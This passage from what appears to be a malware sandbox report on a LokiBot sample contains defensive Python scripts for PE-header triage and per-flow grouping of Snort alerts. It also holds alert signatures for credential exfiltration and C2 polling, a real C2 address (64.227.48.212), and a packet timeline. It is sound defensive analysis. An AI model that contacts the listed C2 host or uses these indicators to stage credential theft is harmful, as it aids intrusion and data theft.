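    fh = e_lfanew + 4                                       # IMAGE_FILE_HEADER
    machine, nsec, tstamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, fh)
    opt = fh + 20                                           # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    image_base = struct.unpack_from("<I", pe, opt + 28)[0]
    dll_chars = struct.unpack_from("<H", pe, opt + 70)[0]
    n_dirs = struct.unpack_from("<I", pe, opt + 92)[0]
    dirs = [struct.unpack_from("<II", pe, opt + 96 + 8 * i) for i in range(min(n_dirs, 16))]
    com = dirs[DIR_COM_DESCRIPTOR] if len(dirs) > DIR_COM_DESCRIPTOR else (0, 0)

    sections, entry_section = [], None
    for i in range(nsec):
        hdr = opt + opt_size + 40 * i                       # IMAGE_SECTION_HEADER
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", pe, hdr)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        ent = round(entropy8(pe[rawptr:rawptr + rawsize]), 3)
        executable = bool(chars & IMAGE_SCN_MEM_EXECUTE)
        sections.append({"name": name, "va": va, "vsize": vsize, "entropy": ent, "executable": executable})
        if va <= entry_rva < va + max(vsize, rawsize):
            entry_section = name
    return {
        "machine": machine,
        "timestamp_utc": datetime.fromtimestamp(tstamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "entrypoint": image_base + entry_rva,
        "entry_section": entry_section,
        "dll_characteristics": [n for f, n in sorted(DLL_FLAGS.items()) if dll_chars & f],
        "is_dotnet": com != (0, 0),                          # CLR header present
        "sections": sections,
        # executable code above 7 bits/byte is compressed or encrypted: a packer indicator
        "packed_code": [s["name"] for s in sections if s["executable"] and s["entropy"] > 7.0],
    }


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 (not the analysed sample): a high-entropy executable
    .text holding the entry point and a low-entropy .rsrc, both file-aligned to 0x200."""
    rng = random.Random(20230321)
    text = bytes(rng.getrandbits(8) for _ in range(0x1000))   # stands in for packed code
    rsrc = b"\0" * 0x1E0 + b"RT_VERSION" + b"\0" * 0x16        # 0x200 bytes, mostly zero
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0x6419125B, 0, 0, 224, 0x0102)
    dirs = [(0, 0)] * 16
    dirs[DIR_IAT] = (0x2000, 8)                 # one IAT slot, as in the report
    dirs[DIR_COM_DESCRIPTOR] = (0x2008, 0x48)   # CLR header, marks a .NET image
    opt = struct.pack("<HBB9I6H4I2H6I",
                      0x10B, 8, 0,
                      0x1000, 0x200, 0, 0x26AE, 0x2000, 0x3000, 0x400000, 0x1000, 0x200,
                      4, 0, 0, 0, 4, 0,
                      0, 0x4000, 0x200, 0,
                      2, 0x8540,                # GUI; DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)

    def sec(name, vsize, va, rawsize, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)

    hdrs = (dos + b"PE\0\0" + file_hdr + opt
            + sec(b".text", 0x1000, 0x2000, 0x1000, 0x200, 0x60000020)
            + sec(b".rsrc", 0x200, 0x3000, 0x200, 0x1200, 0x40000040))
    return hdrs + b"\0" * (0x200 - len(hdrs)) + text + rsrc


if __name__ == "__main__":
    from pprint import pprint
    pprint(triage(build_sample_pe()))
```

Running the script against the synthetic image reports the entry point at 0x4026ae inside .text, the four DLL characteristics listed above, is_dotnet true and .text as packed code; pointing triage() at a real file is a matter of passing its bytes. The entropy threshold of 7.0 is a triage heuristic, not proof of packing, but an executable section at 7.4 bits per byte that also holds the entry point, as in this sample, deserves the unpacked memory dump rather than the file on disk as the object of further static analysis.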
Timestamp  Protocol  SID  Message  Source Port  Dest Port  Source IP  Dest IP
03/21/23-07:13:21.229954  TCP  2024312  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1  49697  80  192.168.2.4  64.227.48.212
03/21/23-07:13:21.229954  TCP  2024317  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2  49697  80  192.168.2.4  64.227.48.212
03/21/23-07:13:21.229954  TCP  2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)  49697  80  192.168.2.4  64.227.48.212
03/21/23-07:13:22.578656  TCP  2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)  49698  80  192.168.2.4  64.227.48.212
03/21/23-07:13:22.578656  TCP  2024312  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1  49698  80  192.168.2.4  64.227.48.212
03/21/23-07:13:22.578656  TCP  2024317  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2  49698  80  192.168.2.4  64.227.48.212
03/21/23-07:13:23.800015  TCP  2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)  49699  80  192.168.2.4  64.227.48.212
03/21/23-07:13:23.800015  TCP  2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49699  80  192.168.2.4  64.227.48.212
03/21/23-07:13:23.800015  TCP  2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49699  80  192.168.2.4  64.227.48.212
03/21/23-07:13:25.127064  TCP  2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)  49700  80  192.168.2.4  64.227.48.212
03/21/23-07:13:25.127064  TCP  2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49700  80  192.168.2.4  64.227.48.212
03/21/23-07:13:25.127064  TCP  2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49700  80  192.168.2.4  64.227.48.212
03/21/23-07:13:27.165442  TCP  2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)  49701  80  192.168.2.4  64.227.48.212
03/21/23-07:13:27.165442  TCP  2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49701  80  192.168.2.4  64.227.48.212
03/21/23-07:13:27.165442  TCP  2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49701  80  192.168.2.4  64.227.48.212
03/21/23-07:13:28.916498  TCP  2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)  49702  80  192.168.2.4  64.227.48.212
03/21/23-07:13:28.916498  TCP  2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49702  80  192.168.2.4  64.227.48.212
03/21/23-07:13:28.916498  TCP  2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49702  80  192.168.2.4  64.227.48.212
Sorted by time, the eighteen alerts are three signatures firing on each of six HTTP connections to 64.227.48.212:80. The first two connections (source ports 49697 and 49698) carried credential uploads (SIDs 2024312 and 2024317), the next four (49699 to 49702) carried requests for C2 commands (SIDs 2024313 and 2024318), and the Charon/Inferno User-Agent signature (2021641) fired on all six. Each alert timestamp is that of the first client data segment after the three-way handshake in the packet list below (for port 49697: SYN at 07:13:21.054, handshake complete at 07:13:21.223, data at 07:13:21.229954).
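Grouping alerts by flow is what turns this table into an incident statement (which connections moved data, which were polls, what the bot's check-in cadence was). The script below does that grouping. It is an added example and not Joe Sandbox's or Emerging Threats' code: ALERT_LINES is the alert table above transcribed into one-alert-per-line form, the SID groups are taken from the alert messages in that table, and the function names parse_alerts, flows_from_alerts and summarize are the example's own.

```python
"""Per-flow triage of the Snort alerts listed in the report.  Added example,
not Joe Sandbox or Emerging Threats code.  ALERT_LINES is transcribed from the
report's alert table; the SID groupings follow the alert messages."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean

ALERT_LINES = """\
03/21/23-07:13:21.229954 TCP 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 49697 80 192.168.2.4 64.227.48.212
03/21/23-07:13:21.229954 TCP 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 49697 80 192.168.2.4 64.227.48.212
03/21/23-07:13:21.229954 TCP 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 49697 80 192.168.2.4 64.227.48.212
03/21/23-07:13:22.578656 TCP 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 49698 80 192.168.2.4 64.227.48.212
03/21/23-07:13:22.578656 TCP 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 49698 80 192.168.2.4 64.227.48.212
03/21/23-07:13:22.578656 TCP 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 49698 80 192.168.2.4 64.227.48.212
03/21/23-07:13:23.800015 TCP 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 49699 80 192.168.2.4 64.227.48.212
03/21/23-07:13:23.800015 TCP 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 49699 80 192.168.2.4 64.227.48.212
03/21/23-07:13:23.800015 TCP 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 49699 80 192.168.2.4 64.227.48.212
03/21/23-07:13:25.127064 TCP 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 49700 80 192.168.2.4 64.227.48.212
03/21/23-07:13:25.127064 TCP 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 49700 80 192.168.2.4 64.227.48.212
03/21/23-07:13:25.127064 TCP 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 49700 80 192.168.2.4 64.227.48.212
03/21/23-07:13:27.165442 TCP 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 49701 80 192.168.2.4 64.227.48.212
03/21/23-07:13:27.165442 TCP 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 49701 80 192.168.2.4 64.227.48.212
03/21/23-07:13:27.165442 TCP 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 49701 80 192.168.2.4 64.227.48.212
03/21/23-07:13:28.916498 TCP 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 49702 80 192.168.2.4 64.227.48.212
03/21/23-07:13:28.916498 TCP 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 49702 80 192.168.2.4 64.227.48.212
03/21/23-07:13:28.916498 TCP 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 49702 80 192.168.2.4 64.227.48.212
"""

SID_EXFIL = {2024312, 2024317}   # "Application/Credential Data Exfiltration"
SID_POLL = {2024313, 2024318}    # "Request for C2 Commands"
SID_UA = {2021641}               # "User-Agent (Charon/Inferno)"
# timestamp, protocol, SID, free-text message, then sport dport src dst at the end
LINE_RE = re.compile(r"^(\S+) (TCP|UDP) (\d+) (.+?) (\d+) (\d+) (\S+) (\S+)$")


def parse_alerts(text: str) -> list:
    """One dict per alert line: timestamp, protocol, SID, message and the 4-tuple flow."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, proto, sid, msg, sport, dport, src, dst = m.groups()
        alerts.append({"ts": datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"),
                       "proto": proto, "sid": int(sid), "msg": msg,
                       "flow": (src, int(sport), dst, int(dport))})
    return alerts


def flows_from_alerts(alerts: list) -> list:
    """Group alerts by connection and label each connection by what LokiBot did on it."""
    by_flow = defaultdict(list)
    for a in alerts:
        by_flow[a["flow"]].append(a)
    flows = []
    for flow, items in by_flow.items():
        sids = {a["sid"] for a in items}
        if sids & SID_EXFIL:
            phase = "exfil"        # stolen credentials were uploaded on this connection
        elif sids & SID_POLL:
            phase = "c2_poll"      # the bot asked the panel for commands
        else:
            phase = "other"
        flows.append({"flow": flow, "first_seen": min(a["ts"] for a in items),
                      "sids": sorted(sids), "phase": phase, "loki_ua": bool(sids & SID_UA)})
    return sorted(flows, key=lambda f: f["first_seen"])


def summarize(flows: list) -> dict:
    """Incident-level facts: C2 endpoint(s), whether data left the host, poll cadence."""
    exfil = [f for f in flows if f["phase"] == "exfil"]
    polls = [f for f in flows if f["phase"] == "c2_poll"]
    gaps = [(b["first_seen"] - a["first_seen"]).total_seconds() for a, b in zip(polls, polls[1:])]
    return {
        "c2": sorted({(f["flow"][2], f["flow"][3]) for f in flows}),
        "exfil_flows": len(exfil),
        "poll_flows": len(polls),
        "first_exfil": exfil[0]["first_seen"].strftime("%H:%M:%S.%f") if exfil else None,
        "mean_poll_gap_s": round(mean(gaps), 3) if gaps else None,
        # an upload on a flow that also carried the LokiBot User-Agent, not a lone UA hit
        "credential_theft_confirmed": any(f["loki_ua"] for f in exfil),
    }


if __name__ == "__main__":
    flows = flows_from_alerts(parse_alerts(ALERT_LINES))
    for f in flows:
        print(f["first_seen"].time(), f["flow"], f["phase"], f["sids"])
    print(summarize(flows))
```

On this report's alerts the summary is one C2 endpoint (64.227.48.212:80), two upload flows, four poll flows, first exfiltration at 07:13:21.229954 and a mean gap of about 1.7 s between polls. The gap is measured between the first alert of consecutive poll connections, which, as the packet list shows, is the first data segment after each handshake; on a live sensor the same grouping over hours of alerts gives the check-in interval a beaconing detection would key on, and the credential_theft_confirmed flag is the field that should escalate a host from "malware seen" to "credentials compromised".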
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Mar 21, 2023 07:13:21.054405928 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:21.223337889 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:21.223686934 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:21.229954004 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:21.398396015 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:21.398611069 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:21.567040920 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.199431896 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.199486017 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.199523926 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.199561119 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.199584961 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.199598074 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.199629068 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.199635029 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.199664116 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.199671984 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.199671984 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.199696064 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.199707031 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.199733973 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.199743986 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.199749947 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.199781895 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.199784994 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.199821949 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.368415117 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.368516922 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.368561983 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.368576050 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.368594885 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.368621111 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.368626118 CET  80  49697  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.368668079 CET  49697  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.405898094 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.574153900 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.574321032 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.578655958 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.746587038 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:22.746746063 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:22.914777040 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.510366917 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.510523081 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.510556936 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.510648012 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.510678053 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.510725021 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.510727882 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.510778904 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.510790110 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.510813951 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.510844946 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.510881901 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.510922909 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.510998011 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.629591942 CET  49699  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.680857897 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.680969954 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.680986881 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.681025982 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.681041956 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.681066990 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.681080103 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.681107998 CET  80  49698  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.681124926 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.681175947 CET  49698  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.797202110 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.797342062 CET  49699  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.800014973 CET  49699  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:23.967341900 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:23.967590094 CET  49699  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:24.135057926 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.722923040 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.722959042 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.722980022 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.723011971 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.723036051 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.723062038 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.723079920 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.723099947 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.723121881 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.723145962 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.723330975 CET  49699  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:24.723442078 CET  49699  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:24.723543882 CET  49699  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:24.890304089 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.890337944 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.890364885 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.890384912 CET  49699  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:24.890391111 CET  80  49699  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:24.890398979 CET  49699  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:24.890431881 CET  49699  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:24.956021070 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:25.124252081 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:25.124414921 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:25.127063990 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:25.295428038 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:25.296231985 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:25.464880943 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.076277018 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.076349974 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.076397896 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.076426029 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.076463938 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.076497078 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.076508999 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.076514006 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.076571941 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.076577902 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.076627016 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.076628923 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.076672077 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.076673031 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.076713085 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.076721907 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.076766014 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.076788902 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.076828957 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.244888067 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.244920015 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.244941950 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.244962931 CET  80  49700  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.244961977 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.244990110 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.245038986 CET  49700  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.724775076 CET  49701  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:26.892939091 CET  80  49701  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:26.893163919 CET  49701  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:27.165441990 CET  49701  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:27.333664894 CET  80  49701  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:27.333852053 CET  49701  80  192.168.2.4  64.227.48.212
Mar 21, 2023 07:13:27.501837015 CET  80  49701  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:28.111509085 CET  80  49701  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:28.111579895 CET  80  49701  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:28.111625910 CET  80  49701  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:28.111692905 CET  80  49701  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:28.111742020 CET  80  49701  64.227.48.212  192.168.2.4
Mar 21, 2023 07:13:28.111743927 CET  49701  80  192.168.2.4  64.227.48.212
                  Mar 21, 2023 07:13:28.111792088 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111812115 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.111850023 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111860991 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.111898899 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111947060 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111991882 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.112008095 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.112081051 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281061888 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281157970 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281245947 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281291962 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281315088 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281349897 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281374931 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281395912 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281443119 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281459093 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281542063 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281586885 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281599045 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281631947 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281687975 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281692982 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281733036 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281785965 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281815052 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281830072 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281877041 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281903982 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281932116 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281977892 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.282002926 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.282027960 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.282082081 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.282092094 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.282129049 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.282197952 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.327450037 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.450213909 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.450320005 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.450367928 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.450449944 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.451137066 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.451137066 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.746226072 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.913429022 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.913705111 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.916497946 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.083816051 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.083960056 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.251243114 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829490900 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829539061 CET804970264.227.48.212192.168.2.4
